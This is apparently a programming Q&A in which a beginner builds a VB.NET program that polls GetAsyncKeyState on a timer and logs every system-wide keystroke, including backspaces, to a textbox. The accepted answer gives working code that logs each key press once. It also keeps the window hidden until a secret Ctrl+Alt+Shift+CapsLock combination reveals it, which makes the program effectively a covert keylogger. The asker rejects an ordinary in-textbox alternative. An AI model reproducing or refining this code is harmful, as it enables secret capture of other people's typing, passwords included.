# textbox outputs multiple letters visual basic [for loop]

Tags: vb.net, visual-studio, keyboard, visual-studio-2013

so I didn't really know how to write the title, but here's what I'm trying to do. If you press any key on your keyboard, it outputs that letter to the textbox multiple times. What I need is a check to not output the same letter twice unless you release the key and press the key again. I've have been messing with it the past hour and can't seem to figure it out. I've tried using arrays which seemed promising, but I still didn't get it right. Anyways here's the snippet of code:

```
Private Sub tmrKeys_Tick(sender As Object, e As EventArgs) Handles tmrKeys.Tick
        Dim result As Integer
        Dim key As String
        Dim i As Integer

        For i = 2 To 90
            result = 0
            result = GetAsyncKeyState(i)
            If result <> 0 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For
            End If
        Next

        If key <> Nothing Then
            If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
                txtLogs.Text &= key
            Else
                txtLogs.Text &= key.ToLower
            End If
        End If
```

Hopefully that make sense, if you have any questions, just let me know.

Comment: is this vba or vb.net?

Comment: Hmm thats a good question. I just started learning today. I'm guessing vb net since I selected net framework 3.5 @DavidZemens

Answer (score 0, accepted):

Figured it out, Although it's not very elegant, it works.

First I created "global variables"

```
Public Class GlobalVariables
    Public Shared pressed(90) As Integer
    Public Shared result As Integer
    Public Shared key As String
    Public Shared lastKey As String
End Class
```

Then I used those and an array. The timer wasn't keeping the values of the variables before (obviously) and it needed to be since it was set off every 5 milliseconds.

```
Private Sub tmrKeys_Tick(sender As Object, e As EventArgs) Handles tmrKeys.Tick
      Dim i As Integer

      For i = 3 To 90
      GlobalVariables.key = Nothing
      GlobalVariables.result = GetAsyncKeyState(i)
      If GlobalVariables.result <> 0 And GlobalVariables.pressed(i) = 0 Then
            GlobalVariables.pressed(i) = GlobalVariables.result
            GlobalVariables.key = Chr(i)
            If i = 13 Then GlobalVariables.key = vbNewLine
            If i = 8 Then GlobalVariables.key = " _backspaces_ "
            Exit For
      End If
      GlobalVariables.pressed(i) = GlobalVariables.result
      Next

      If GlobalVariables.key <> Nothing Then
      GlobalVariables.lastKey = GlobalVariables.key
      If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
            txtLogs.Text &= GlobalVariables.key
      Else
            txtLogs.Text &= GlobalVariables.key.ToLower
      End If
      End If

      If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso My.Computer.Keyboard.CapsLock AndAlso My.Computer.Keyboard.ShiftKeyDown Then
      Me.Visible = True
      Me.Opacity = 100
      Me.ShowInTaskbar = True
      Me.ShowIcon = True
      End If
    End Sub
```

Answer (score 0):

When a key is depressed and held, the `TextBox` keeps raising `KeyDown` and `KeyPress` events.  You can use the `KeyDown` event to suppress all but the first `KeyPress` and thereby reject all subsequent characters:

```
Private allowCharacter As Boolean = True

Private Sub TextBox1_KeyDown(sender As Object, e As KeyEventArgs) Handles TextBox1.KeyDown
    If allowCharacter Then
        'This is the first KeyDown event so disallow any further characters.
        allowCharacter = False
    Else
        'This is not the first KeyDown event so don't raise KeyPress to reject the repeated character.
        e.SuppressKeyPress = True
    End If
End Sub

Private Sub TextBox1_KeyUp(sender As Object, e As KeyEventArgs) Handles TextBox1.KeyUp
    'Allow the first character on the next KeyDown event.
    allowCharacter = True
End Sub
```

Comment: I need to use the code I posted for a specific reason. This code won't work for my purposes. I need help modifying my code. Thanks for taking the time to help though